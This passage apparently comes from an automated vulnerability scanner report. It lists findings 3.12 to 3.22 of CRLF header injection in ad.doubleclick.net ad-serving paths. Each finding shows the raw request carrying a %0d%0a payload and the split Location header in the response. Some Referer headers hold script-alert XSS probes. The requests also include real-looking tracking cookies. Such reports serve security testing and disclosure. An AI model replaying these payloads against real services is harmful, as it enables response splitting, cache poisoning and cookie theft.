The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 8bee1%0d%0ad42cbf71b63 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 8bee1 and d42cbf71b63 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /8bee1%0d%0ad42cbf71b63/N6344.126328.SPECIFICMEDIA/B5358490.6;sz=300x250;click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=25167%3Bc=151326%3Bb=898911%3Bp=ui%3DwJ6hSWn821G3dA%3Btr%3DwzKYu5Hfx_D%3Btm%3D0-0%3Bts=20110510134326%3Bdct=;ord=20110510134326? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=25167;c=151326;b=898911;ts=20110510134326;p=ui%3DwJ6hSWn821G3dA%3Btr%3DwzKYu5Hfx_D%3Btm%3D0-0;cxt=811200901:2278864-99003145:2268034-99008493:2265143-104201101:2278864-99011741:2267570-1012201040:2278864-99016158:2288221-1208201001:2290663-21012048:2290663
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8bee1
d42cbf71b63
/N6344.126328.SPECIFICMEDIA/B5358490.6;sz=300x250;click=http: //ads.specificmedia.com/click/v=5;m=2;l=25167;c=151326;b=898911;p=ui=wJ6hSWn821G3dA;tr=wzKYu5Hfx_D;tm=0-0;ts=20110510134326;dct=;ord=20110510134326
Date: Tue, 10 May 2011 17:46:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.12. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6543.131803.TURN.COM/B5513576.10

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 4c0ec%0d%0a3e7d65afa05 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 4c0ec and 3e7d65afa05 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /4c0ec%0d%0a3e7d65afa05/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033?;click=http://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4c0ec
3e7d65afa05
/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033:
Date: Tue, 10 May 2011 14:00:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.13. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 5bb6e%0d%0a487b017bf01 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 5bb6e and 487b017bf01 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /5bb6e%0d%0a487b017bf01/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;u=728x90%7Cbpage%7Cleaderboard_top%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=728x90;tile=1;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5bb6e
487b017bf01
/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina:
Date: Tue, 10 May 2011 13:30:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.14. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/casio/cttech

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 149d2%0d%0a16e2e59be91 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 149d2 and 16e2e59be91 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /149d2%0d%0a16e2e59be91/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/149d2
16e2e59be91
/x1.rtb/casio/cttech;sz=728x90;click=http: //bn.xp1.ru4.com/bclick
Date: Tue, 10 May 2011 14:24:26 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.15. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/doubledma/ron/ctest

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 8d6d5%0d%0a7af32fd48fa was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 8d6d5 and 7af32fd48fa begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /8d6d5%0d%0a7af32fd48fa/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHyQALCE4K2hvK36QcGA==&_o=15607&_eo=52786&_et=1305036746&_a=1791737&_s=44276902&_d=1125798&_pm=52786&_pn=17918657&redirect=;u=17918657;ord=1861503? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuiJLyUfJTc6QLMq36AaYuJD9DZyLwYICzq352RH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBbGh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRTc4NjFkOTU4YTU1L5gC7gXAAgTIAvbrig6oAwHoA90F6AOmA_UDAgAAxIAG5qKevvn1pN9U%26num%3D1%26sig%3DAGiWqtzE70M5ZVPZNUy9dig2lfZ1QJdjuQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHyQALCE4K2hvK36QcGKsDJ2HTxV_xoZb9UQ&_nv=1&_CDbg=1791737&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAPlWGwAAAAAApi0RAAAAAADBahEBAAAAANQwEQAAAAAA1TARAAAAAAAy-txBAAAAAAAA9D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSHlRQUxDRTRLMmh2SzM2UWNHQT09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAUAAAAAAAAAEFBLTAwMDAwMDAxOTMxNzA4NDI3DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MCEAAAAAAAAAMTA2M2JiZTA5OWVhNjQ4Yy5hbm9ueW1vdXMuZ29vZ2xlDAAAAAAAAABeXjE3OTgwOTk5NzIDAAAAAAAAADczMwYAAAA7AAAAAAAAAAAAAAAAAAAAAMpHyU0AAAAA
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d6d5
7af32fd48fa
/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http: //bn.xp1.ru4.com/bclick
Date: Tue, 10 May 2011 14:24:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.16. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.128132.INTERCLICK/B4640114.13

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 35660%0d%0ae53d0cda688 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 35660 and e53d0cda688 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /35660%0d%0ae53d0cda688/N3175.128132.INTERCLICK/B4640114.13;sz=728x90;click=http://a1.interclick.com/icaid/128532/tid/f7860f8c-0b93-4b41-8149-a2cc91d07361/click.ic?;ord=634406189604069363? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/35660
e53d0cda688
/N3175.128132.INTERCLICK/B4640114.13;sz=728x90;click=http: //a1.interclick.com/icaid/128532/tid/f7860f8c-0b93-4b41-8149-a2cc91d07361/click.ic
Date: Tue, 10 May 2011 14:11:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.17. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 2043e%0d%0af14956544cf was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 2043e and f14956544cf begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /2043e%0d%0af14956544cf/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000801877/mnum=0000884206/cstr=1219384=_4dc949b1,2440706181,801877%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=1219384/optn=64?trg=;ord=2440706181? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2043e
f14956544cf
/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000801877/mnum=0000884206/cstr=1219384=_4dc949b1,2440706181,801877^884206^1183^0,1_/xsxdata=$xsxdata/bnum=1219384/optn=64
Date: Tue, 10 May 2011 14:25:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.18. http://ad.doubleclick.net/adj/N5776.126265.CASALEMEDIA/B5120103.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.126265.CASALEMEDIA/B5120103.7

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 53cb3%0d%0a191ad04e8be was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 53cb3 and 191ad04e8be begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /53cb3%0d%0a191ad04e8be/N5776.126265.CASALEMEDIA/B5120103.7;sz=300x250;click0=http://c.casalemedia.com/c/4/1/84667/;ord=567896543? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84667/210582/index.html
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53cb3
191ad04e8be
/N5776.126265.CASALEMEDIA/B5120103.7;sz=300x250;click0=http: //c.casalemedia.com/c/4/1/84667/;ord=567896543
Date: Tue, 10 May 2011 14:26:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.19. http://ad.doubleclick.net/adj/contentnext.ilm/paid [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/contentnext.ilm/paid

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 78319%0d%0ad567f4b602b was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 78319 and d567f4b602b begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /78319%0d%0ad567f4b602b/contentnext.ilm/paid;;tile=2;kw=cs2;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78319
d567f4b602b
/contentnext.ilm/paid;;tile=2;kw=cs2;sz=300x250;ord=[timestamp]:
Date: Tue, 10 May 2011 13:39:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.20. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/longpost

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 70fd5%0d%0ae6e9bec567f was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 70fd5 and e6e9bec567f begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /70fd5%0d%0ae6e9bec567f/huffpost.politics/longpost;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=mid_article;u=300x250%7Cbpage%7Cmid_article%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=300x250;tile=3;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/70fd5
e6e9bec567f
/huffpost.politics/longpost;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-caro:
Date: Tue, 10 May 2011 13:21:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.21. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 8c28c%0d%0a2dc2a43a1fe was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so the Location header is terminated after 8c28c and 2dc2a43a1fe begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /8c28c%0d%0a2dc2a43a1fe/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=300x250,300x600;tile=5;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c28c
2dc2a43a1fe
/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina:
Date: Tue, 10 May 2011 13:27:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.22. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news/curtain

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79d28%0d%0ae5080b05c95 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

